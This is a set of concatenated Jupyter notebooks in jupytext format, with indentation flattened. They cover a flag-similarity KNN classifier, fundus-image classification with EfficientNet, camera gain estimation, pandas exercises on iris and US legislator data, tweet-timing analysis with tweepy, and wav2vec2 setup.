jpgcount = 0
for i in filecounts:
if 'txt' in i:
txtcount +=1
if 'jpg' in i:
jpgcount += 1
print('txt counts:',txtcount)
print('jpg counts:',jpgcount)
# copy_file_resize.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
# +
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
plt.rcParams['figure.figsize'] = (20,20)
import os,time
from glob import glob
from PIL import Image
from sklearn import neighbors
import re
# -
df = pd.read_csv('flags_url.csv')
def read_flag(countrycode='IN',file='', res=(128,64)):
countrycode = countrycode.upper()
#url = df[df['alpha-2']==countrycode].image_url
path = f'flags/{countrycode}.png'
if file!='':
path = file
flag = Image.open(path).convert('RGB').resize(res,)
flag = np.array(flag)
return flag
re.match(r'set\d+','set10')
# +
name2code = lambda x: df[df.country==x]['alpha-2'].to_list()[0]
set1 = ['Venezuela', 'Ecuador', 'Colombia']
set2 = ['Slovenia', 'Russia', 'Slovakia']
set3 = ['Luxembourg','Netherlands']
set4 = ['Norway','Iceland']
set5 = ['New Zealand', 'Australia']
set6 = ['Indonesia', 'Monaco']
set7 = ['Senegal','Mali']
set8= ['India','Niger']
set9= ['Yemen','Syria']
set10 = ['Mexico','Italy']
sets=[]
local_vars = dict(locals())  # snapshot, so names created in the loop don't break iteration
for var in local_vars:
if re.match(r'set\d+',var):
sets += [eval(var)]
#print(sets)
codesets = [ list(map(name2code,s)) for s in sets ]
CATEGORIES = list(map(lambda x: x[0], sets))
allcodes = []
for cs in codesets: allcodes+=cs
CATEGORIES
# +
# Similar Flags Plot
fig,axes = plt.subplots(len(codesets),max(map(len,codesets)))
plt.axis('off')
for idx,similars in enumerate(codesets):
#similars = similars+[[]] if len(similars)==2 else similars
for idy,s in enumerate(similars):
if len(s): axes[idx,idy].imshow(read_flag(s))
#axes[idx,idy].axis('off')
# -
X = np.zeros((len(allcodes),read_flag(allcodes[0]).size))
Y = np.zeros(len(allcodes))
for idx,code in enumerate(allcodes):
# find the category
category = 0
for i,cset in enumerate(codesets):
if code in cset:
category = i
break
x = read_flag(code)
X[idx,:] = x.flatten()
Y[idx] = category
clf = neighbors.KNeighborsClassifier(n_neighbors=len(CATEGORIES), weights='distance')
clf.fit(X,Y)
clf.predict([read_flag(codesets[3][1]).flatten()])
print(df[df['alpha-2']==codesets[9][-1]].image_url.to_list())
alltests = glob('test_flags/*.png')
fig,axes = plt.subplots(len(alltests),2,figsize=(20,40))
for idx,f in enumerate(glob('test_flags/*.png')):
#print(f)
test = read_flag(file=f)
test_big = read_flag(file=f,res=(521,256))
p = clf.predict([test.flatten()])[0]
pname = CATEGORIES[int(p)]
pimg = read_flag(name2code(pname), res=(512,256))
axes[idx][0].imshow(test_big)
axes[idx][1].imshow(pimg)
# ee250/labML/examples/flags-knn/using_knn.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="view-in-github" colab_type="text"
# <a href="https://colab.research.google.com/github/hihi5456/pytorch/blob/main/Fundusdata.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + id="i7TZFTXDMW9T" colab={"base_uri": "https://localhost:8080/"} outputId="f189984c-ba38-40ca-edd8-b3631484a2b9"
# !pip install adabelief-pytorch
# !pip install timm
# + id="SXlJpJWjMBAt" outputId="b4ced94a-d934-49f0-8752-feef09e53283" colab={"base_uri": "https://localhost:8080/", "height": 388}
import torch
import torchvision
from torchvision import transforms, datasets
import torch.utils.data.dataloader
import matplotlib.pyplot as plt
import torch.optim as optim
import torch.nn as nn
import torch.nn.functional as F
from torch.utils.data import Dataset,ConcatDataset
import adabelief_pytorch
import numpy as np
from sklearn.metrics import roc_auc_score, auc
# + id="GI24FnUUUek5"
from timm.data import IMAGENET_DEFAULT_MEAN, IMAGENET_DEFAULT_STD, IMAGENET_INCEPTION_MEAN, IMAGENET_INCEPTION_STD
from timm.models.efficientnet_blocks import round_channels, resolve_bn_args, resolve_act_layer, BN_EPS_TF_DEFAULT
from timm.models.efficientnet_builder import EfficientNetBuilder, decode_arch_def, efficientnet_init_weights
from timm.models.features import FeatureInfo, FeatureHooks
from timm.models.helpers import build_model_with_cfg, default_cfg_for_features
from timm.models.layers import create_conv2d, create_classifier
from timm.models.registry import register_model
import timm
import timm.models.efficientnet
# + id="sJk32gm8MaKw"
device = 'cuda' if torch.cuda.is_available() else 'cpu'
torch.manual_seed(456)
if device =='cuda':
torch.cuda.manual_seed_all(456)
# + id="gUw8KzrIAMoO"
class skipblock(nn.Module):
def __init__(self, in_channel,out_channel,outsize):
super(skipblock, self).__init__()
self.conv0=nn.Conv2d(in_channel,out_channel,1)
self.silu=nn.SiLU()
self.block=nn.Sequential(
nn.Conv2d(out_channel, 64*in_channel, 1),
nn.BatchNorm2d(in_channel*64),
nn.SiLU(),
nn.Dropout2d(),
nn.Conv2d(in_channel*64, in_channel*64, 3, 1, 1),
nn.BatchNorm2d(in_channel*64),
nn.SiLU(),
nn.Dropout2d(),
nn.Conv2d(in_channel*64,out_channel,1),
nn.BatchNorm2d(out_channel),
nn.SiLU(),
nn.Dropout2d(),
)
self.bn=nn.BatchNorm2d(out_channel)
self.pool=nn.AdaptiveAvgPool2d(outsize)
def forward(self, x):
out=self.conv0(x)
out=self.silu(out)
skip=out
#print(out.shape)
out=self.block(out)
#print(out.shape)
out=out+skip
#print(out.shape)
out=self.bn(out)
out=self.pool(out)
return out
# + id="KruW8Wp0MsOE"
#gelu=nn.GELU()
class testblock1(nn.Module):
def __init__(self,ni,num_class):
super(testblock1, self).__init__()
self.block0=skipblock(ni,32,300)
self.block1=skipblock(32,3,100)
self.block2=skipblock(3,1,10)
self.classifier = nn.Sequential(
nn.Linear(1*10*10,num_class),
)
def forward(self,x):
out=self.block0(x)
out=self.block1(out)
out=self.block2(out)
out = out.view(out.size(0),-1)
out=self.classifier(out)
return out
# + id="QIUzslrD-3Cw"
model=timm.models.efficientnet_l2(pretrained=False)
model.reset_classifier(39)
model.drop_rate=0.5
model=model.to(device)
# + id="cJDzxyTx_MTq"
# + id="84SWd1P_MvaO"
model=testblock1(3,39).to(device)
# + id="yZuDsLGbUhuf"
model=timm.models.efficientnet.efficientnet_b7(pretrained=False).to(device)
model.reset_classifier(39)
model.drop_rate=0.5
model=model.to(device)
# + colab={"base_uri": "https://localhost:8080/", "height": 340} id="hofEy7-ujMfg" outputId="3ad0d5c0-f1b8-453f-cd90-3587955c4521"
a=torch.rand((1,3,600,600)).to(device)
model(a)
# + id="kTH2gucTMd-I" colab={"base_uri": "https://localhost:8080/"} outputId="0ac9e6ed-7384-4637-c034-f428a188aa9a"
from google.colab import drive
drive.mount("/content/gdrive")
# + id="6BK3ks9mUKVc"
PATH='/content/gdrive/MyDrive/Colab Notebooks/fundusdataset/1000images/'
# + id="jBpvKMsU-PrU"
transform = transforms.Compose(
[
transforms.RandomRotation(45),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Resize((600,600)),
transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))
]
)
# + id="hv9ie854UO21"
fundus_data = torchvision.datasets.ImageFolder(root=PATH,transform=transform)
# + id="sVNkMs9J_6vB"
train_size=int(0.8*len(fundus_data))
test_size=len(fundus_data)-train_size
# + id="IdYKtd5UAge-"
train_set, test_set=torch.utils.data.random_split(fundus_data,[train_size,test_size])
# + id="Tb29JkY2YryJ"
torch.save(train_set,PATH+'trainset.csv')
torch.save(test_set,PATH+'testset.csv')
# + id="fi2t5zzJNKll"
train_set=torch.load(PATH+'trainset.csv')
test_set=torch.load(PATH+'testset.csv')
# + id="Y7s8LnZ7_A6w"
train_loader = torch.utils.data.DataLoader(train_set,drop_last=True,
batch_size=8,
shuffle=True,
num_workers=2,
)
test_loader = torch.utils.data.DataLoader(test_set,
batch_size=1,
shuffle=False,
num_workers=4,
)
# + colab={"base_uri": "https://localhost:8080/"} id="QeoswJ04BYjv" outputId="f6e4b4d4-a495-48c4-9bad-57d2374938b8"
criterion = nn.CrossEntropyLoss().to(device)
#optimizer = torch.optim.Adam(model.parameters(), lr = 0.001)
optimizer=adabelief_pytorch.AdaBelief(model.parameters(),lr=0.001)
#lr_sche = optim.lr_scheduler.StepLR(optimizer, step_size=10, gamma=0.5)
# + colab={"base_uri": "https://localhost:8080/"} id="xOV8Mv4NBfwc" outputId="7c8bd5b9-32ef-4b7b-e73d-e44113a82fe5"
trainedepochs=0
print(len(train_loader))
epochs = 500
for epoch in range(epochs):
model.train()
running_loss = 0.0
for i, data in enumerate(train_loader, 0):
# get the inputs
inputs, labels = data
inputs=inputs.to(device)
labels = labels.to(device)
# zero the parameter gradients
optimizer.zero_grad()
# forward + backward + optimize
outputs = model(inputs)
# (numarray.max()/numarray[labels[0][0].to(torch.int).tolist()-1])
#loss = (1/numnum[labels[0][0].to(torch.int).tolist()-1])*criterion(outputs, labels.to(torch.float)/10)
loss = criterion(outputs, labels)
#print( (numnum.max()/numnum[labels[0][0].to(torch.int).tolist()-1]))
loss.backward()
optimizer.step()
# print statistics
running_loss += loss.item()
if i % 20 == 19:
print('[%d, %5d] loss: %.3f' %
(epoch + 1, i + 1, running_loss / 20))
running_loss = 0.0
#lr_sche.step()
if epoch % 50==49:
correct = 0
total = 0
model.eval()
with torch.no_grad():
for data in test_loader:
images, labels = data
images = images.to(device)
labels = labels.to(device)
outputs = model(images)
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
#print(predicted ,labels)
correct += (predicted == labels).sum().item()
print('Accuracy of the network on the {} test images: {} %'.format(len(test_set),
100 * correct / total))
#if ( epoch==100 or epoch==150 or epoch==200 or epoch==250 or epoch==300 or epoch==350 or epoch==400 or epoch==450 or epoch==500 or epoch==550):
if (epoch==100 or epoch==200 or epoch==300 or epoch==400 or epoch==500 ):
torch.save(optimizer.state_dict(), PATH+'optimizer{}.pt'.format(trainedepochs+epoch))
torch.save(model.state_dict(), PATH+'model{}.pt'.format(trainedepochs+epoch))
# loop over the dataset multiple times
#Check Accuracy
#acc = acc_check(resnet50, testloader, epoch, save=1)
torch.save(model.state_dict(), PATH+'model{}.pt'.format(trainedepochs+epochs))
torch.save(optimizer.state_dict(), PATH+'optimizer{}.pt'.format(trainedepochs+epochs))
print('Finished Training')
# + id="blsQVexeeW6-"
correct = 0
total = 0
model.eval()
with torch.no_grad():
for data in test_loader:
images, labels = data
images = images.to(device)
labels = labels.to(device)
outputs = model(images)
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
#print(predicted ,labels)
correct += (predicted == labels).sum().item()
print('Accuracy of the network on the {} test images: {} %'.format(len(test_set),
100 * correct / total))
# Fundusdata.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# ## Estimate the camera gain and offset from experimental data
#
# This notebook presents one approach to estimating the average gain and offset of a camera directly from experimental data. This can be useful if you just want a quick, approximately accurate estimate, or if you are analyzing data someone else gave you without providing this information. To work, it relies on the presence of a constant (on the 200-frame time scale) non-uniform background in the experimental data.
#
# Reference:
# * [Kothe et al, Histochemistry and Cell Biology, 2014](https://doi.org/10.1007/s00418-014-1211-4)
#
# ### Configuring the directory
# Create an empty directory somewhere on your computer and tell Python to go to that directory.
# +
import matplotlib.pyplot as pyplot
import numpy
import os
import storm_analysis.sa_library.datareader as dataReader
os.chdir("/home/hbabcock/Data/storm_analysis/jy_testing/")
print(os.getcwd())
numpy.random.seed(1)
# -
# ### Create simulated data
# +
import storm_analysis.jupyter_examples.est_cam_params as est_cam_params
# Create localizations for simulation.
est_cam_params.createLocalizations()
# Create simulated movie (200 frames)
est_cam_params.createMovie(gain = 2.0, offset = 100.0)
# -
# Display an image
# +
import storm_analysis.sa_library.datareader as datareader
frame = datareader.inferReader("test.tif").loadAFrame(5).astype(numpy.float64)
pyplot.figure(figsize = (6, 6))
pyplot.imshow(frame, interpolation = 'nearest', cmap = "gray")
pyplot.show()
# -
# ### Load movie and calculate mean and variance for each pixel
def calcMeanVar(movie_name):
with dataReader.inferReader(movie_name) as dr:
[w,h,l] = dr.filmSize()
if(l>200):
l = 200
n = numpy.zeros((h,w), dtype = numpy.int64)
nn = numpy.zeros((h,w), dtype = numpy.int64)
for i in range(l):
im = dr.loadAFrame(i)
im = im.astype(numpy.int64)
n = n + im
nn = nn + im*im
mean = n/float(l)
var = nn/float(l) - mean*mean
return [mean, var]
[mean, var] = calcMeanVar("test.tif")
# ### Plot data with estimated fit
#
# In this case we know what the actual camera values are so we can just use them. In general the easiest approach is to do the fit by eye, adjusting the gain and offset values to give you a line that goes through the cluster of points at the bottom of the mean vs variance graph. In Kothe et al. the authors estimated the fit using the [RANSAC](https://en.wikipedia.org/wiki/Random_sample_consensus) algorithm.
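As a rough alternative to fitting by eye, an ordinary least-squares line through the (mean, variance) pairs recovers the gain (slope) and offset (x-intercept), since var = gain × (mean − offset). A minimal sketch on synthetic Poisson data — with real data you would fit the `mean` and `var` arrays computed above, and a robust fit such as RANSAC handles outlier pixels better:

```python
import numpy as np

rng = np.random.default_rng(1)

# Synthetic camera: photon counts are Poisson, so variance equals mean
# in photon units; the camera applies a gain and adds an offset.
gain, offset = 2.0, 100.0
photons = rng.uniform(5, 25, size=2000)          # per-pixel photon rates
frames = rng.poisson(photons, size=(200, 2000))  # 200 frames of 2000 pixels
adu = gain * frames + offset                     # camera counts

mean = adu.mean(axis=0)
var = adu.var(axis=0)

# var = gain * (mean - offset)  =>  slope is the gain, x-intercept the offset.
slope, intercept = np.polyfit(mean, var, 1)
est_gain = slope
est_offset = -intercept / slope
print(round(est_gain, 2), round(est_offset, 1))
```

With these settings the fit should land close to gain = 2.0 and offset = 100.0, matching the values used in the simulation above.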
# +
# You may have to adjust these depending on your data.
x_max = 150
x_min = 100
x = numpy.array([x_min, x_max])
# In this function 100.0 is the offset and 2.0 is the camera gain.
y = (x - 100.0)*2.0
pyplot.scatter(mean,var,s=1)
pyplot.plot(x,y,color = "black")
pyplot.xlim(x_min,x_max)
# You may have to adjust the y range depending on your data.
pyplot.ylim(0,200)
pyplot.show()
# jupyter_notebooks/estimating_camera_parameters.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Lesson 3 Class Exercises: Pandas Part 1
#
# With these class exercises we learn a few new things. When new knowledge is introduced you'll see the icon shown on the right:
# <span style="float:right; margin-left:10px; clear:both;"></span>
# ## Reminder
# The first check-in of the project is due next Tuesday. After today, you should have everything you need to know to accomplish that first part.
# ## Get Started
# Import the Numpy and Pandas packages
import numpy as np
import pandas as pd
# ## Exercise 1: Import Iris Data
# Import the Iris dataset made available to you in the last class period for the Numpy part 2 exercises. Save it to a variable named `iris`. Print the first 5 rows and the dimensions to ensure it was read in properly.
iris = pd.read_csv('../../data/iris.csv')
print(iris.shape)
iris.head()
# Notice how much easier this was to import compared to the Numpy `genfromtxt`. We did not have to skip the headers, we did not have to specify the data type and we can have mixed data types in the same matrix.
# ## Exercise 2: Import Legislators Data
# For portions of this notebook we will use a public dataset that contains all of the current legislators of the United States Congress. This dataset can be found [here](https://github.com/unitedstates/congress-legislators).
#
# Import the data directly from this URL: https://theunitedstates.io/congress-legislators/legislators-current.csv
#
# Save the data in a variable named `legislators`. Print the first 5 lines, and the dimensions. You can get the dimensions of the dataframe using the `.shape` member variable.
legislators = pd.read_csv("https://theunitedstates.io/congress-legislators/legislators-current.csv")
print(legislators.shape)
legislators.head()
# ## Exercise 3: Explore the Data
# ### Task 1
# Print the column names of the legislators dataframe and explore the type of data in the data frame.
legislators.columns
# ### Task 2
# Show the data types of all of the columns in the legislator data. To do this, use the `.dtypes` member variable. Do all of the data types seem appropriate for the data?
legislators.dtypes
# Show all of the data types in the iris dataframe. To do this, use the `.dtypes` member variable.
iris.dtypes
# ### Task 3
# It's always important to know where the missing values are in your data. Are there any missing values in the legislators dataframe? How many per column?
#
# Hint: we didn't learn how to find missing values in the lesson, but we can use the `isna()` function.
legislators.isna().sum()
# How about in the iris dataframe?
iris.isna().sum()
# ### Task 4
# It is also important to know if you have any duplicated rows. If you are performing statistical analyses and you have duplicated entries they can affect the results. So, let's find out. Are there any duplicated rows in the legislators dataframe? Print the number of duplicates. If there are duplicates, print the rows. What function could we use to find out if we have duplicated rows?
legislators.duplicated().sum()
# Do we have duplicated rows in the iris dataset? Print the number of duplicates. If there are duplicates, print the rows.
iris.duplicated().sum()
iris[iris.duplicated()]
# If there are duplicated rows should we remove them or keep them?
# ### Task 5
# It is important to also check that the range of values in our data matches expectations. For example, if we expect to have three species in our iris data, we should check that we see three species. How many political parties should we expect in the legislators data? If we do not see what we expect, perhaps the data is incomplete. Let's check. You can find out how many unique values there are per column using the `.nunique()` function. Try it for both the legislators and the iris data sets.
legislators.nunique()
legislators['state'].unique()
iris.nunique()
# What do you think? Do we see what we might expect? Are there fields where this type of check doesn't matter? In what fields might this type of exploration matter?
# Check to see if you have all of the values expected for a given field. Pick a column you know should have a set number of values and print all of the unique values in that column. Do so for both the legislator and iris datasets.
legislators['gender'].unique()
iris['species'].unique()
# ## Exercise 5: Describe the data
# For both the legislators and the iris data, get descriptive statistics for each numeric field.
iris.describe()
legislators.describe()
# ## Exercise 6: Row Index Labels
# For the legislator dataframe, let's change the row labels from numerical indexes to something more recognizable. Take a look at the columns of data. Is there anything you might want to substitute as a row label? Pick one and set the index labels. Then print the top 5 rows to see if the index labels are present.
legislators.index = legislators['last_name']
legislators.head()
legislators.loc['Graham']
# ## Exercise 7: Indexing & Sampling
# Randomly select 15 Republicans or Democrats (your choice) from the senate.
# +
legislators[(legislators['type'] == 'sen') &
(legislators['party'] == 'Democrat')].sample(15)
# -
# ## Exercise 8: Dates
# Let's learn something not covered in the Pandas 1 lesson regarding dates. We have the birthdates for each legislator, but they are in a String format. Let's convert it to a datetime object. We can do this using the `pd.to_datetime` function. Take a look at the online documentation to see how to use this function. Convert the `legislators['birthday']` column to a `datetime` object. Confirm that the column is now a datetime object.
legislators['birthday'] = pd.to_datetime(legislators['birthday'])
legislators['birthday'].head()
# Now that we have the birthdays as `datetime` objects, how can we calculate their age? Hint: we can use the `pd.Timestamp.now()` function to get a datetime object for this moment. Let's subtract their birthdays from the current time. Print the top 5 results.
(pd.Timestamp.now() - legislators['birthday']).head()
# Notice that the result of subtracting two `datetime` objects is a `timedelta` object. It contains the difference between two time values. The value we calculated therefore gives us the number of days old. However, we want the number of years.
#
# To get the number of years we can divide the number of days old by the number of days in a year (i.e. 365). However, we need to extract out the days from the `datetime` object. To get this, the Pandas Series object has an accessor for extracting components of `datetime` objects and `timedelta` objects. It's named `dt` and it works for both. You can learn more about the attributes of this accessor at the [datetime objects page](https://pandas.pydata.org/pandas-docs/stable/reference/series.html#datetime-properties) and the [timedelta objects page](https://pandas.pydata.org/pandas-docs/stable/reference/series.html#timedelta-properties) by clicking. Take a moment to look over that documentation.
#
# How would you then extract the days in order to divide by 365 to get the years? Once you've figured it out, do so, convert the years to an integer, and add the resulting series back into the legislator dataframe as a new column named `age`. Hint: use the [astype](https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.Series.astype.html) function of Pandas to convert the type.
legislators['age']=((pd.Timestamp.now() - legislators['birthday']).dt.days /365).astype('int')
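# A self-contained sketch of the same computation on made-up birthdays, with a pinned "now" so the result is reproducible (note the days/365 shortcut ignores leap days, so ages near a birthday can be off by one):

```python
import pandas as pd

birthdays = pd.to_datetime(pd.Series(["1980-03-01", "1990-06-30"]))
now = pd.Timestamp("2024-01-01")   # pinned instead of pd.Timestamp.now()

# timedelta -> whole days via the .dt accessor, then approximate years
approx_age = ((now - birthdays).dt.days / 365).astype("int")
print(approx_age.tolist())   # [43, 33]
```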
# Next, find the youngest, oldest and average age of all legislators
legislators['age'].describe()
# Who are the oldest and youngest legislators?
# +
legislators[(legislators['age'] == legislators['age'].min())]
# -
legislators[(legislators['age'] == legislators['age'].max())]
# ## Exercise 9: Indexing with loc and iloc
# Reindex the legislators dataframe using the state, and find all legislators from a state of your choice using the `loc` accessor.
legislators.index = legislators['state']
legislators.loc['NY']
# Use the loc command to find all legislators from South Carolina and North Carolina
legislators.loc[['SC', 'NC']]
# Use the loc command to retrieve all legislators from California, Oregon and Washington and only get their full name, state, party and age
legislators.loc[['CA', 'OR', 'WA'],['full_name', 'state', 'party', 'age']].head()
legislators.iloc[0:10, 0:5]
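# The label/position distinction can be sketched on a toy frame (hypothetical names and index): `loc` selects by index label, `iloc` by integer position.

```python
import pandas as pd

toy = pd.DataFrame(
    {"full_name": ["A. Smith", "B. Jones", "C. Lee"], "age": [55, 61, 47]},
    index=["CA", "NY", "CA"],        # state-label index, as in Exercise 9
)

by_label = toy.loc["CA"]             # label-based: every row labelled CA
by_position = toy.iloc[0:2, 0:1]     # position-based: first 2 rows, first column

print(len(by_label))                 # 2
print(by_position.shape)             # (2, 1)
```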
# class_exercises/new/D04-Pandas_Part1.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# +
import tweepy
import pandas as pd
import numpy as np
from datetime import datetime
import matplotlib.pyplot as plt
import seaborn as sns
# %matplotlib inline
# -
# Import keys
from credentials import *
# Setup Twitter API connection
def twitter_setup():
auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)
auth.set_access_token(ACCESS_TOKEN, ACCESS_SECRET)
api = tweepy.API(auth)
return api
# +
# Extract Twitter data
extractor = twitter_setup()
tweets = extractor.user_timeline(screen_name='realdonaldtrump', count=200)
print('Number of tweets extracted: {}.\n'.format(len(tweets)))
# Display 5 most recent tweets
print('5 recent tweets:\n')
for idx, tweet in enumerate(tweets[:5]):
# if tweet.text.startswith('RT'):
print("%d.) %s\n" % (idx+1, tweet.text))
# -
# +
# Create dataframe
df = pd.DataFrame([tweet.text for tweet in tweets], columns=['Tweets'])
df.head(n=10)
# -
# Explore tweepy object
print(dir(tweets[0]))
# Explore most recent tweet and its properties
print(tweets[0].id)
print(tweets[0].created_at)
print(tweets[0].source)
print(tweets[0].favorite_count)
print(tweets[0].favorited)
print(tweets[0].retweet_count)
print(tweets[0].retweeted)
print(tweets[0].geo)
print(tweets[0].coordinates)
print(tweets[0].entities)
# Add columns to df
df['len'] = np.array([len(tweet.text) for tweet in tweets])
df['ID'] = np.array([tweet.id for tweet in tweets])
df['Date'] = np.array([tweet.created_at for tweet in tweets])
df['Source'] = np.array([tweet.source for tweet in tweets])
df['Likes'] = np.array([tweet.favorite_count for tweet in tweets])
df['Retweets'] = np.array([tweet.retweet_count for tweet in tweets])
# Show first 5 records
df.head()
# Show datatypes
df.info(show_counts=True, memory_usage='deep')
df.describe()
# Sort by various ways
df.sort_values(['Likes', 'len'], ascending=False).head()
# Explore likes histogram
ax = df.Likes.hist()
ax.set_title('Number of Tweets vs. Number of Likes')
ax.set_xlabel('No. of Likes')
ax.set_ylabel('No. of Tweets')
# Which tweets received zero likes?
df[df.Likes == 0].tail()
# Group by month and day
df.groupby([df.Date.dt.month, df.Date.dt.day]).count().Tweets
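# The grouping trick above can be sketched with made-up timestamps: grouping on `.dt` components counts rows per (month, day).

```python
import pandas as pd

dates = pd.to_datetime(pd.Series(
    ["2017-09-01 08:00", "2017-09-01 21:30", "2017-09-02 10:15"]))
toy = pd.DataFrame({"Date": dates, "Tweets": ["a", "b", "c"]})

per_day = toy.groupby([toy.Date.dt.month, toy.Date.dt.day]).Tweets.count()
print(per_day.tolist())   # [2, 1] -- two rows on Sep 1, one on Sep 2
```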
# key step!
df.index = df['Date']
# convert utc to est? Find out what tz it is first.
df.groupby(df.index.tz_localize('GMT').tz_convert('US/Eastern').hour).count().Tweets.plot(kind='barh')
df.groupby(df.index.tz_localize('GMT').tz_convert('US/Eastern').hour).count().Tweets
df.groupby(df.index.tz_localize('GMT').tz_convert('US/Eastern').hour).count().Tweets.max()
xticks_12 = ['12 AM', '1 AM', '2 AM', '3 AM', '4 AM', '5 AM', '6 AM', '7 AM', '8 AM', '9 AM', '10 AM', '11 AM',
'12 PM', '1 PM', '2 PM', '3 PM', '4 PM', '5 PM', '6 PM', '7 PM', '8 PM', '9 PM', '10 PM', '11 PM']
# Show GMT to EDT
df.index.tz_localize('GMT').tz_convert('US/Eastern')
# Time format x-axis to 12-o'clock time
xticks = pd.date_range('00:00', '23:00', freq='H', tz='US/Eastern').map(lambda x: x.strftime('%I %p'))
xticks
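# Modern pandas removed the `pd.datetime` alias, so a version-safe way to build 12-hour labels is to call `strftime` on each `Timestamp` directly. A small sketch (note `%I` zero-pads, e.g. '01 AM', unlike the hand-written `xticks_12` list above):

```python
import pandas as pd

ticks = [pd.Timestamp(2000, 1, 1, h).strftime("%I %p") for h in range(3)]
print(ticks)   # ['12 AM', '01 AM', '02 AM']
```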
# +
# pd.date_range?
# -
# Convert from GMT to US EST.
ax = df.groupby(df.index.tz_localize('GMT').tz_convert('US/Eastern').hour).count().Tweets.plot(kind='bar')
ax.set_xticks(np.arange(24))
ax.set_xticklabels(xticks, rotation=45)
ax.set_title('Number of Tweets vs. Time')
ax.set_xlabel('Time (h)')
ax.set_ylabel('No. of Tweets')
df.groupby(df.index.weekday_name).count().Tweets.sort_values(ascending=False)
df.groupby(df.index.hour).count().Tweets.plot()
# Compute metrics
mean = np.mean(df.len)
print('Tweet length average is: {}\n'.format(mean))
# +
# Get most-liked and retweeted tweet
fav_max = np.max(df.Likes)
rt_max = np.max(df.Retweets)
fav_idx = df[df.Likes == fav_max].index[0]
rt_idx = df[df.Retweets == rt_max].index[0]
# Max favorite tweet:
print("Most liked tweet is:")
print("%s" % df['Tweets'][fav_idx])
print("Number of likes: {}".format(fav_max))
print("{} characters.\n".format(df['len'][fav_idx]))
# Max retweeted tweet:
print("Most retweeted tweet is:")
print("%s" % df['Tweets'][rt_idx])
print("Number of likes: {}".format(rt_max))
print("{} characters.\n".format(df['len'][rt_idx]))
# -
# Construct pandas Series objects
time_length = pd.Series(df.len.values, index=df.Date)
time_favorite = pd.Series(df.Likes.values, index=df.Date)
time_retweet = pd.Series(df.Retweets.values, index=df.Date)
# plot Series obj
ax = time_length.plot(figsize=(16,4), color='r', title='Tweet length vs. DateTime')
ax.set_xlabel("DateTime")
ax.set_ylabel("Tweet length")
# Plot Likes and retweets over time:
time_favorite.plot(figsize=(16,4), label="Likes", legend=True, title="Likes & Retweets vs. DateTime")
ax = time_retweet.plot(figsize=(16,4), label="Retweets", legend=True)
ax.set_xlabel("DateTime")
ax.set_ylabel("Total (k)")
# +
# Get sources
sources = []
for source in df.Source:
if source not in sources:
sources.append(source)
# Print sources
print("Tweet created using:")
for source in sources:
print("* {}".format(source))
# +
# Create a pie chart of sources:
percent = np.zeros(len(sources))
for source in df.Source:
for idx in range(len(sources)):
if source == sources[idx]:
percent[idx] += 1
# Convert raw counts to fractions of all tweets
percent /= len(df.Source)
pie_chart = pd.Series(percent, index=sources, name='Platform sources')
pie_chart.plot.pie(fontsize=11, autopct='%.2f', figsize=(6, 6))
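# The counting loop above can be replaced by `value_counts(normalize=True)`, which returns fractions that already sum to 1 (toy data for illustration, not real tweet sources):

```python
import pandas as pd

src = pd.Series(["iPhone", "iPhone", "Android", "Web"])
shares = src.value_counts(normalize=True)

print(shares["iPhone"])   # 0.5
```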
# develop/20170924_initial_testing_stuff_out.ipynb
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + [markdown] id="Ar6WxXxBzAuk"
# This notebook is inspired from a very good [HuggingFace Tutorial](https://colab.research.google.com/github/patrickvonplaten/notebooks/blob/master/Fine_Tune_XLSR_Wav2Vec2_on_Turkish_ASR_with_%F0%9F%A4%97_Transformers.ipynb#scrollTo=bTjNp2KUYAl8)
# + [markdown] id="2xpl09xvO7hm"
# # pip install
# + colab={"base_uri": "https://localhost:8080/"} id="-3tuYZdqPADr" executionInfo={"elapsed": 19334, "status": "ok", "timestamp": 1616488973694, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "02556879631367095259"}, "user_tz": -60} outputId="ee6759db-0ef6-4f98-ec02-345634bad734"
# !pip install phonemizer
# !apt-get install espeak
# + [markdown] id="zudrwLDGO9rY"
# # notebook
# + colab={"base_uri": "https://localhost:8080/"} id="qQBWJA2jMNaD" executionInfo={"status": "ok", "timestamp": 1616608629320, "user_tz": -60, "elapsed": 802, "user": {"displayName": "<NAME>", "photoUrl": "", "userId": "02556879631367095259"}} outputId="134c002b-de05-479a-956c-f033be77f911"
# !nvidia-smi -L
# + id="hlaKDvP4mpq6" colab={"base_uri": "https://localhost:8080/"} executionInfo={"status": "ok", "timestamp": 1616608662705, "user_tz": -60, "elapsed": 21392, "user": {"displayName": "Omar US", "photoUrl": "", "userId": "02556879631367095259"}} outputId="c7cf96ff-2a11-4c1d-e1c5-582aa3c8bd48"
from google.colab import drive
drive.mount('/content/drive')
# + id="Dj-n0wsCMIAf"
# !pip install git+https://github.com/huggingface/datasets.git
# !pip install git+https://github.com/huggingface/transformers.git
# !pip install torchaudio
# !pip install librosa
# !pip install jiwer
